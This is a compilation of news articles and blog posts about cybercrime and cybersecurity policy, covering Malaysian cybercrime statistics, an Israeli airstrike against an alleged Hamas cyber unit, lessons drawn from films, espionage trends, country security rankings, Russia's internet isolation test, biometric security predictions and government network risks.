LABUAN: Cyber crimes involving losses of RM67.6 million in 2,207 cases were reported in the first three months of this year, according to a senior officer of the Communications and Multimedia Ministry (KKMM) today.
Its deputy secretary-general (policy), Shakib Ahmad Shakir, said the ministry and agencies under it were concerned over the large amounts of money lost through such scams.
The three most common types of cyber crimes were cheating via telephone calls which recorded 773 cases with RM26.8 million in losses, cheating in online purchases with 811 cases totaling RM4.2 million and the ‘African Scam’ with 371 cases totaling RM14.9 million.
E-financial fraud recorded 212 cases involving losses of RM21.5 million, he said when opening a Labuan-level briefing on awareness to combat cyber crimes and human trafficking, here.
He said the losses were reported in online scams, credit card frauds, identity thefts and data breaches.
“KKMM is determined to combat cyber crimes in view of the concerns raised on the rise in cyber crimes committed through various means.
“Cyber crimes are a serious threat to the people as these frauds can cause them to lose hundreds of thousands of ringgit of their hard-earned money,” he said.
The briefing is part of the commitment of KKMM to create public awareness on cyber crimes through education and promotion and publicity campaigns.
Shakib said that according to the Commercial Crime Investigation Department, 13,058 cheating cases were reported in 2017 compared to 10,394 last year.
“I was told that telecommunication fraud is the most common form of (cyber) crime in Labuan with 16 complaints in 2017 and 19 complaints last year, a 35 per cent increase,” he said.
Shakib said the ministry would continue to cooperate with its strategic partners like the media, police, the Malaysian National News Agency (Bernama) and Information Department to combat the menace. – Bernama
KUALA LUMPUR: A national awareness plan on the management of cybersecurity and cybercrime will be launched at the end of this year, Deputy Prime Minister Datuk Seri Dr Wan Azizah Wan Ismail said today.
She said the plan, which was being developed by the National Cyber Security Agency (NACSA), was expected to be implemented in January 2020, targeting four groups – children, youths, adults and parents, as well as organisations.
Dr Wan Azizah, who is also chairman of the E-Sovereignty Committee, said various parties were involved in developing the plan, including government agencies, the private sector, industries and non-governmental organisations.
The plan was an effort to address cyber threats comprehensively besides the National Cyber Security Strategy which was still being developed, she said.
“One of the things that we (the government) stress is the management of cybersecurity and we have the National Cyber Security Strategy … where we look at cyber attacks in other countries. This is important for us to protect the banking system and so on,” she told reporters in a special interview at her office in Parliament House in conjunction with the first anniversary of the Pakatan Harapan (PH) government.
The National Cyber Security Strategy, among others, covers the management of cyber incidences through an active cyber defence approach which outlines proactive, integrated action at every layer of system defence and information and communications technology of the country.
Dr Wan Azizah said Malaysia is also aware that international collaboration is very important and necessary to improve the effectiveness of the management of cybersecurity and cybercrime.
She said that among the initiatives that are being implemented is developing the ASEAN Regional Forum (ARF) Cyber Security Work Plan which is a joint plan for cybersecurity among ARF member countries.
Dr Wan Azizah said Malaysia, together with Australia, has developed the ‘Cyber Point of Contact’, which is a database of the list of liaison officers in member countries, to get assistance and cooperation during cyber incidences. – Bernama
The Israel Defense Force (IDF) claims to have neutralized an “attempted” cyber attack by launching airstrikes on a building in Gaza Strip from where it says the attack was originated.
As shown in a video tweeted by IDF, the building in the Gaza Strip, which Israeli fighter drones have now destroyed, was reportedly the headquarters for Palestinian Hamas military intelligence, from where a cyber unit of hackers was allegedly trying to penetrate Israel’s cyberspace.
“We thwarted an attempted Hamas cyber offensive against Israeli targets. Following our successful cyber defensive operation, we targeted a building where the Hamas cyber operatives work. HamasCyberHQ.exe has been removed,” said the Israeli Defence Forces on Twitter.
However, the Israel Defense Force has not shared any information about the attempted cyber attack by the Hamas group, saying it would reveal the country’s cyber capabilities.
According to Judah Ari Gross of Times of Israel, the commander of the IDF’s Cyber Division said, “We were a step ahead of them the whole time,” and “this was one of the first times where Israeli soldiers had to fend off a cyber attack while also fighting a physical battle.”
However, it’s not the first time when a country retaliates to a cyberattack with a physical attack. In 2015-16, the U.S. military reportedly killed two ISIS hackers—Siful Haque Sujan and Junaid Hussainof Team Poison hacking group—using drone strikes in Syria.
The commander did not reveal the name of the target, but did say that the cyber attack by Hamas was aimed at “harming the way of life of Israeli citizens.”
The tension between Israel and Hamas has increased over the last year, with the latest conflict began on Friday after Hamas militants launched at least 600 rockets and mortars at Israel and shot two Israeli soldiers
In retaliation to the violence by Hamas, the Israel military has carried out their own strikes on what it claimed were hundreds of Hamas and Islamic Jihad targets in the coastal enclave.
So far, at least 27 Palestinians and 4 Israeli civilians have been killed, and over 100 of them have been injured.
The IDF said its airstrike targeted and killed Hamed Ahmed Abed Khudri, who the Israel military reportedly accused of funding the Hamas rocket fire attacks by transferring money from Iran to armed factions in Gaza.
“Transferring Iranian money to Hamas and the PIJ [Palestinian Islamic Jihad] doesn’t make you a businessman. It makes you a terrorist,” IDF wrote in a tweet that included an image of a Toyota car in flames.
In a new development, Israel has stopped its air strikes on the Palestinian territory and lifted all protective restrictions imposed near the Gaza area, after Palestinian officials offered a conditionalceasefire agreement with Israel to end the violence.
While stories about breaches and cyberattacks have only become commonplace in the news relatively recently, Hollywood has had an interest in cybersecurity for some time now. To coincide with the Oscars, we’re taking a look at several popular films that dealt with cyberattacks on companies or government institutions, industrial espionage, and cyberwar, in order to take away some lessons for businesses.
Endpoint security and the problem with critical infrastructure.
In Skyfall (2012), one of the latest James Bond films, the British Intelligence Service, MI6, is under attack, and is trying to stop vital information from being leaked to the public. In turn, Bond is fighting to survive, and struggling to stay relevant in a world where the figure of the field agent is becoming less important thanks to technological advances, and where popular services such as social networks can put an agent’s privacy at risk. Silva, a cybercriminal, and the film’s bad guy, manages to interfere with satellite signals, attack the London Underground, tamper with elections in several African countries, and destabilize the stock market… All from a computer.
Although the film contains such important concepts as the protection of critical infrastructures, and is the first Bond film to use a cyberattack as a lethal weapon, there is one serious error that needs to be highlighted. The employees of MI6 get their hands on a computer belonging to Silva, the criminal hacker, and connect it to the intelligence service’s network to extract information from it.
Accessing the network via an infected endpoint endangers the organization’s entire infrastructure, and is an important example of how simple mistakes in a business environment can put our privacy at risk. Despite this slip up, Q, the technology expert at MI6, says, one might say quite rightly: “I’ll hazard I can do more damage on my laptop, sitting in my pyjamas before my first cup of Earl Grey than you can do in a year in the field.”
The documentary Zero Days (2016) investigates the by now well-known sophisticated computer worm Stuxnet, which is suspected to have been developed by the United States and Israel in order to sabotage the Iranian nuclear program in 2010. Stuxnet also managed to make its way onto a private network via an infected endpoint – in this case a pen drive – which injected malicious code onto the programmable logic controllers (PLC) used to automate the nuclear power station’s processes.
The worm took over more than 1,000 machines in the industrial environment, and forced them to self-destruct. This attack became the first known digital weapon in international cyberwar, the first virus capable of paralyzing functioning hardware.
The malware leveraged multiple zero day vulnerabilities in order to infect Windows computers, specifically targeting nuclear centrifuges used to produce the uranium needed for weapons and nuclear reactors. Despite being created specifically to affect nuclear facilities in 2010, it seems that Stuxnet has mutated and spread to different organizations outside the industrial sector.
Human error in cyberwar
In the film Blackhat (2015), after attacks on nuclear power stations in Hong Kong and on the Chicago Stock Exchange, the US and Chinese governments are forced to cooperate in order to protect themselves. In light of these new threats, the FBI turns to a convicted cybercriminal, Hathaway, to help discover who is behind the IT attacks: a black hat hacker seeking to get rich by bringing down the stock market.
In this case, several of the attacks are carried out by the black hat using a RAT (Remote Access Trojan), a piece of malware that can take over a system via a remote connection.Those collaborating with the FBI also fall back on two important weapons to attack corporate networks: an email with an attached PDF containing a keylogger.
This tool is used to access a piece of software exclusive to the National Security Agency (NSA), which is not willing to collaborate with the FBI. As with the other two films discussed here, they also use an infected pen drive as an attack vector, in this case to gain access to a bank’s network and drain the accounts of the cybercriminal who is wreaking so much havoc.
These three examples from the film industry can provide us with some valuable tips for a business environment:
Pen drives must never be inserted in our systems if you don’t know where they come from, or without first running a malware analysis. To carry out a scan like this, advanced platforms such as Panda Adaptive Defense provide a detailed vision of all endpoints. It’s also vital to scan files that come in as attachments.
Attachments from unknown senders or people who aren’t in our address books must never be opened.
We need to make sure that our employees know how to deal with social engineeringattacks and such common mistakes as connecting unknown devices to the corporate network.
The top 20 most notorious cyber-espionage operations have increased their activity by a third in recent years – and are looking to conduct more attacks, according to a security company.
The most advanced hacking groups are becoming bolder when conducting campaigns, with the number of organisations targeted by the biggest campaigns rising by almost a third
A combination of new groups emerging and threat actors developing successful strategies for breaking into networks has seen the average number of organisations targeted by the most active hacking groups rise from 42 between 2015 and 2017 to an average of 55 in 2018.
Groups like Chafer, DragonFly, Gallmaker and others are all conducting highly targeted hacking campaigns as they look to gather intelligence against businesses they think hold valuable information.
Once attackers might have needed the latest zero-days to gain access to corporate networks, but now it’s spear-phishing emails laced with malicious content that are most likely to provide attackers with the initial entry they need.
And because these espionage groups are so proficient at what they do, they have well tried-and-tested means of conducting activity once they’re inside a network.
“It’s like they have steps which they go through, which they know are effective to get into networks, then for lateral movement across networks to get what they want,” Orla Cox, director of Symentec’s security response unit told ZDNet.
“It makes them more efficient and, for organizations, it makes them harder to spot because a lot of the activity looks like traditional enterprise activity,” she added.
In many of the cases detailed in the report, attackers are deploying what Symantec refers to as ‘living-off-the-land’ tactics: the attackers uses everyday enterprise tools to help them travel across corporate networks and steal data, making the campaigns more difficult to discover.
Not only is the number of targeted campaigns on the rise, but there’s a larger variety in the organisations being targeted. Organisations in sectors like utilities, government and financial services have regularly found themselves targets of organised cyber-criminal gangs, but increasingly, these groups are expanding their attacks to new targets.
“Often in the past they’d have a clear focus on one sector, but now we see these campaigns can focus on a wide variety of targets, ranging from telecoms companies, hotels, universities. It’s harder to pinpoint exactly what their end goal is,” said Cox.
While intelligence gathering remains the key goal of many of these campaigns, some are beginning to expand by also displaying an interest in compromising systems.
This is a particularly worrying trend, because while stealing data in itself is bad enough, attackers with the ability to operate cyber-physical systems could be much worse.
In the face of a rise in targeted attacks, governments are increasingly pointing the finger not just at nations but individuals believed to be involved in cyber espionage. For example, the United States named individuals it claims are responsible for conducting cyber attacks: they include citizens of Russia, North Korea, Iran and China. Symantec’s report suggests the indictment might disrupt some targeted operations, but it’s unlikely that cyber espionage campaigns will be disappearing anytime soon.
With so much of our information (including incredibly personal data) being found online, cybersecurity is of the utmost importance.
So just where in the world are you cyber safe – if anywhere?
Our study looked at 60 countries and found huge variances in a number of categories, from malware rates to cybersecurity-related legislation. In fact, not one country is « top of the class » across the board. All of the countries we analyzed could do with some significant improvements.
However, there were some countries that lacked significantly in a variety of areas and others who outperformed the majority of countries. So with that in mind, we’ve created rankings for these 60 countries, from the least cyber safe to the most cyber safe.
Our methodology: how did we find the countries with the worst cybersecurity?
We considered seven criteria, each of which had equal weight in our overall score. These were:
The percentage of mobiles infected with malware – software designed to gain unauthorized access to, destroy, or disrupt a device’s system
The percentage of computers infected with malware – software designed to gain unauthorized access to, destroy, or disrupt a computer’s system
The number of financial malware attacks – malicious programs created to steal a user’s money from the bank account on their computer system
The percentage of telnet attacks (by originating country) – the technique used by cybercriminals to get people to download a variety of malware types
The percentage of attacks by cryptominers – software that’s developed to take over a user’s computer and use its resources to mine currency (without the user’s permission)
The best-prepared countries for cyber attacks
The countries with the most up-to-date legislation
Apart from the latter two, all of the scores were based on the percentage of attacks during 2018. The best-prepared countries for cyber attacks were scored using the Global Cybersecurity Index (GCI) scores. The most up-to-date legislation was scored based on existing legislation (and drafts) that covered seven categories (national strategy, military, content, privacy, critical infrastructure, commerce, and crime). Countries received a point for having legislation in a category or half a point for a draft.
For each criterion, the country was given a point based on where it ranked between the highest-ranking and lowest-ranking countries. Countries with the least cyber-secure scores were given 100 points, while countries with the most cyber-secure scores were allocated zero points. All of the countries in between these two scores received a score on a percentile basis, depending on where they ranked.
The total score was achieved by averaging each country’s score across the seven categories.
All of the data used to create this ranking system is the latest available, and we have only included countries where we could cover all of the data points.
Which is the least cyber-secure country in the world?
According to our study, Algeria is the least cyber-secure country in the world. It was the highest-ranking country for lack of legislation and computer malware rates, and also received a high score in the categories for mobile malware and preparation for cyber attacks.
Other high-ranking countries were Indonesia, Vietnam, Tanzania, and Uzbekistan.
Some countries ranked at the top of one category but did better in others, improving their overall score. Germany received the highest score for financial malware, and China received the highest score as the country where most telnet attacks originated from.
The highest-scoring countries per category were:
Highest percentage of mobile malware infections – Bangladesh – 35.91% of users
Highest number of financial malware attacks – Germany – 3% of users
Highest percent of computer malware infections – Algeria – 32.41%
Highest percentage of telnet attacks (by originating country) – China – 27.15%
Highest percentage of attacks by cryptominers – Uzbekistan – 14.23% of users
Least prepared for cyber attacks – Vietnam – 0.245 score
Which is the most cyber-secure country in the world?
Our findings revealed Japan to be the most cyber-secure country in the world. It scored incredibly low across the majority of categories, only scoring a little higher in the preparation for cyber attacks and legislation categories.
Other top-performing countries included France, Canada, Denmark, and the United States.
As before, some countries scored well in one category but had other scores that brought their average up. These include Ukraine, which had the lowest financial malware rate, and Uzbekistan, Sri Lanka, and Algeria, which had the lowest telnet attack scores.
The lowest-scoring countries per category were:
Lowest percentage of mobile malware infections – Japan – 1.34% of users
Lowest number of financial malware attacks – Ukraine – 0.3% of users
Lowest percent of computer malware infections – Denmark – 5.9% of users
Lowest percentage of telnet attacks (by originating country) – Algeria, Uzbekistan, and Sri Lanka – 0.01%
Lowest percentage of attacks by cryptominers – Denmark – 0.61% of users
Best prepared for cyber attacks – Singapore – 0.925 score
Most up-to-date legislation for cybersecurity – France, China, Russia, and Germany – all 7 categories covered
Overall cybersecurity rankings (from the worst to the best)
Percentage of Mobiles Infected with Malware
Financial Malware Attacks (% of Users)
Percentage of Computers Infected with Malware
Percentage of Telnet Attacks by Originating Country (IoT)
Percentage of Attacks by Cryptominers
Best Prepared for Cyberattacks
Most Up-to-Date Legislation
United Arab Emirates
What can we take away from these findings?
Despite some countries having clear strengths and weaknesses, there is definite room for improvement in each and every one. Whether they need to strengthen their legislation or users need help putting better protections in place on their computers and mobiles, there’s still a long way to go to make our countries cyber secure.
Plus, as the landscape of cybersecurity constantly changes (cryptominers are growing in prevalence, for example), countries need to try and get one step ahead of cybercriminals.
Brief test ‘disconnecting’ Russia from the internet set to take place before April 1
Reports claim move is part of preparations for a potential cyber-war in the future
Russia has been accused of carrying out a series of cyber-attacks in recent years, prompting NATO and its allies to threaten the country with sanctions
Russia is set to disconnect from the internet temporarily as part of preparations for a potential cyber-war in the future, it has been claimed.
The test – set to take place before April – will see data passing between organisations and Russian citizens remain inside the country instead of being routed internationally.
It comes after a law was introduced to Russia’s parliament last year mandating technical changes required to allow Russia’s internet to operate independently.
April 1 has reportedly been set as the deadline for submitting amendments to the draft law – dubbed the Digital Economy National Program – but the timing of the test has yet to be set in stone, it has been reported.
Under the law, Russia’s internet service providers (IPSs) would be required to ensure the independence of the country’s Runet internet space should foreign powers attempt to isolate the nation online.
Russia has been accused of carrying out a series of cyber-attacks in recent years, prompting NATO and its allies to threaten sanctions.
The country’s ISPs are said to be broadly supportive of the goals of the law but disagree over how it could be implemented.
There are, however, fears among the providers that such a test could also cause ‘major disruption’, according to ZDNet.
The law could also see Russia creating its own version of the internet’s address system, or DNS, with the idea being it could still operate if links to servers located abroad are disconnected.
A dozen organisations oversee the root servers for DNS – none of them based in Russia, the BBC reports.
In October, Britain publicly accused Russia’s military intelligence service of carrying out a campaign of reckless and destabilising cyber-attacks across the world.
Foreign Secretary Jeremy Hunt said the Kremlin had been working in secret to wage indiscriminate and illegal cyber-attacks on democratic institutions and businesses.
In a damning charge sheet, the Government firmly pinned the blame for a string of cyber-attacks on the GRU, the organisation also accused of poisoning double agent Sergei Skripal.
The Foreign Office said the National Cyber Security Centre had assessed with ‘high confidence’ that the GRU was ‘almost certainly’ responsible for multiple attacks which have cost economies millions of pounds.
It added: ‘Given the high confidence assessment and the broader context, the UK Government has made the judgment that the Russian government – the Kremlin – was responsible.’
Hacks included those on the governing body of the Democratic Party in the US, the World Anti-Doping Agency, metro systems and airports in Ukraine, Russia’s central bank and two Russian media outlets.
KUALA LUMPUR: The Government plans to establish a National Cybersecurity policy to better secure the nation against threats, says Gobind Singh Deo.
The Communications and Multimedia Minister said his ministry will be spearheading the policy in collaboration with the National Cybersecurity Agency and the Malaysian Communications and Multimedia Commission.
“With Malaysia’s digital economy growing by leaps and bounds, it is inevitable that there will be unintended consequences.
“Threats like data breaches and theft, sabotage, intrusion, and cyber espionage can have adverse impacts on organisations and the state,” he said.
He said the ministry is now in discussion with various parties to come up with a robust policy.
One of the areas is to develop more local cybersecurity talents.
“Developing the right talent is a very important aspect of cybersecurity preparedness.
“It is crucial that we establish a sustainable model with the cooperation of various government agencies (along with) academic and private institutions,” he said.
Gobind added that he will suggest amending laws to combat cyberbullying and cybercrimes.
“We could introduce new provisions in the Penal Code, for example, so that such crimes could be investigated by the police.
“But before we do all these, I am in the process of discussing it with the police to get their views,” he said.
As a digital technology, biometrics are almost always bound up in some way with cybersecurity. With that in mind, Biometric Update has reviewed predictions for the year ahead to present the most noteworthy, controversial, and troubling among them.
First major biometric hack
A single-factor biometric authentication system will be successfully hacked at scale in 2019, according to security firm Secplicity. This will drive increased adoption of multi-factor authentication, the company says.
Experian’s Data Breach Industry Forecast 2019 also predicts biometric hacking will increase next year, as attackers seek to exploit stolen or altered biometric data, spoofing methods, and deteriorated or manipulated fingerprint and facial recognition sensors. In the report, the company urges organizations to secure all layers of their biometric systems, and to encrypt and store all biometric data in secure servers.
New facial recognition vulnerabilities spur behavioral biometrics
Non-biometric two-factor authentication will be undermined by “SIM swaps” and persistent phishing, cybersecurity service provider Forcepoint says. Biometrics can provide the answer, the company predicts, but behavior analytics will be the preferred method of protection.
New laws and regulations
Acuant President and CEO Yossi Zekri told Biometric Update in an email that new laws or regulations are coming.
“The progress of GDPR will drive continued adoption of identity-related legislation across the world,” he writes. “The United States, currently a hotbed of frustration over the mismanagement of personally identifiable information (PII) and lack of protection for digital identity, will begin to adopt similar legislation in 2019. Recent revelations into questionable business practices and Congress’ increasing focus on technology behemoths Facebook, Amazon, Google and Netflix will drive the U.S. government to reign in the industry with compliance requirements (similar to Sarbanes-Oxley after the Enron and Worldcom debacles).”
Zekri also predicts that systems leveraging both AI and human judgement will outperform the accuracy of fully automated identity verification solutions, and that with an increasing consumer focus on self-sovereign identity, “organizations will start to adopt methods to verify individuals without using personal data. Identity scores – or a similar scoring mechanism – will emerge as a way to verify the individual and replace the need to share PII.”
Nok Nok Labs CEO Phil Dunkelberger also tells Biometric Update that companies should be prepared for a more challenging regulatory environment in the year ahead.
Blockchain hits a roadblock
Mitek CTO Steve Ritter thinks blockchain will be revealed to be unready for mainstream identity platform use in coming year.
“While blockchain continues to grow in popularity with varying use cases, for it to make a significant impact with identity platforms, it will need to considerably improve any existing solution,” Ritter says. “The biggest challenge with blockchain for identity verification is that a public distributed ledger would be accessible to anyone who needed it but owned by no one, which will likely create privacy and security concerns. The system would need buy-ins from both consumers and businesses to get traction and reach an acceptance “tipping point.” It would take time and money to promote the service, far more than what would be required to create and run it. Until businesses figure out how to monetize blockchain and where it can best be adopted in their businesses, we are unlikely to see this technology revolutionize identity management. As a result, expect that at least 30 percent of data management projects using blockchain will fail and more identity platforms will abandon development of blockchain.”
Account takeover fraud, which cost $5.1 billion in 2017 according to Javelin Research, will decrease, Ritter says, as new identity document verification technology turns the tide and prevents more than 40 percent of account takeover fraud attempts in 2019.
Businesses move away from KBA
TrustID’s 2018 State of Call Center Authentication report shows that a mere 10 percent of call center agents very confidently trust knowledge-based authentication (KBA) to accurately identify callers. This is with good reason, the company says, as there were 668 confirmed data breaches and 22.41 million records exposed in the first half of 2018, according to the Identity Theft Resource Center. TrustID says 2019 marks “the final countdown” for KBA, with the factor fading away within five years.
Ritter also predicts that digital identity verification will replace KBA for online marketplaces, as continuing growth in online transactions and data breaches drives a push for greater regulation.
Other predictions from TrustID include that fraud will continue to move to the fraud channel, that financial transactions will have a short window for accurate verification, and that hacks on health care organizations will increase.
Internet of Things devices scam users
“Your smart fridge will start scamming you,” BioCatch Chief Cyber Officer Uri Rivner tells Forbes. “IoT-connected appliances such as refrigerators and washing machines already produce unattended payments that the user cannot personally verify. Fraudsters see this vulnerability now and will begin to take advantage of it.”
It stands to reason that the challenges preventing fraud even when the payer is present would only increase when the device authorizes payments without the user.
All readers are invited to make cybersecurity predictions for 2019 in the comments below.
Most organizations today have multiple attack vectors that require monitoring and defending. Government cybersecurity teams, in comparison, have to manage countless additional entry points for threat actors. While most industries must understand and defend against attacks from vendors, satellite offices, wireless networks and bring-your-own-device (BYOD) threats, governments also have to worry about large numbers of disparate entities that tie into a central information technology hub.
As seen over the past 18 months with attacks in Colorado,Atlanta, Baltimore and Dallas, among others, cities and states must protect their infrastructure, transportation, social services, healthcare, emergency services and many other divisions. The sheer number of connections into government networks substantially increases the risk and complexity facing these administrations.
Extortion via ransomware seems to be the popular choice for many cybercriminals today, but what does tomorrow bring? With so many government services dependent on technology, there are many opportunities for a denial-of-service (DoS) attack. Government cybersecurity experts need to stay ahead of these criminals and, in doing so, understand the environments they’re defending. Defenders must see the entire threat landscape and understand where attacks can come from. Protecting environments with one point of entry is easy; unfortunately, that situation rarely exists in the real world, particularly with government infrastructure.
The Complexity of Governments Increases Risk
Inside every national, state, city and local government are many different departments, each with its own information technology requirements and solutions. Too often, the teams that run these systems don’t interoperate with other groups. For example, in county government, there is a clerk and recorder responsible for elections, police responsible for civil protection and social services responsible for improving social welfare in the community. Each of these groups might have its own IT shop that manages the computers and networks for the department.
There is typically little to no communication between the people who set up, manage and maintain these environments. To make matters worse, the policies and procedures used to build and harden security infrastructures are rarely consistent between departments. Lack of commonality leads to extreme risk, and the larger the government organization, the more points of entry it has and the more threats it faces.
Threat actors understand these deficiencies and can identify vulnerabilities relatively easily through several methods. Today, the most common approach involves phishing attacks in which an attacker attempts to trick an end user into providing credentials for one part of a network. Since most government networks communicate and connect with each other, a breach in one division puts the rest at risk as well.
Imagine that a social worker loses control of his or her credentials, and a threat actor proceeds to access that environment and move laterally through the network to infiltrate the police department and the county clerk and recorder. This individual could acquire valuable data such as voting rolls for a county. The lack of procedures to manage credentials and patch systems between government entities increases the risk of both losing control of login information and permitting lateral movement between government bodies. This scenario epitomizes a substantial risk to governments that other industries do not face.
Government Cybersecurity Improvements Won’t Come Easy
Since governments have so many potential attack vectors, both physically and virtually, government cybersecurity professionals need clear processes, procedures and authority to harden vulnerable environments.
Whether they’re implementing asset management, patch management, change management or any number of critical security mechanisms, governments and their partners need to consolidate and coordinate between internal entities to make sure every attack vector has proper defensive positioning. The number of endpoints, network connections and infrastructure devices that interoperate internally within a government body at any level creates substantial risks, and the entire environment must be understood and modifiable to ensure proper protection.
The challenges governments face in hardening their environments are large and widespread, with drastic change being the only foreseeable solution. Engaging disparate teams to integrate and interoperate, both operationally and procedurally, will take strong leadership and bold decisions. Unless and until we see a major change in both the behavior and understanding of the threat landscape, there will be more and more attacks and, sadly, they will become more dangerous and impactful to governments on a regular basis. Without major modifications inside government cybersecurity organizations, we are in for a bumpy ride.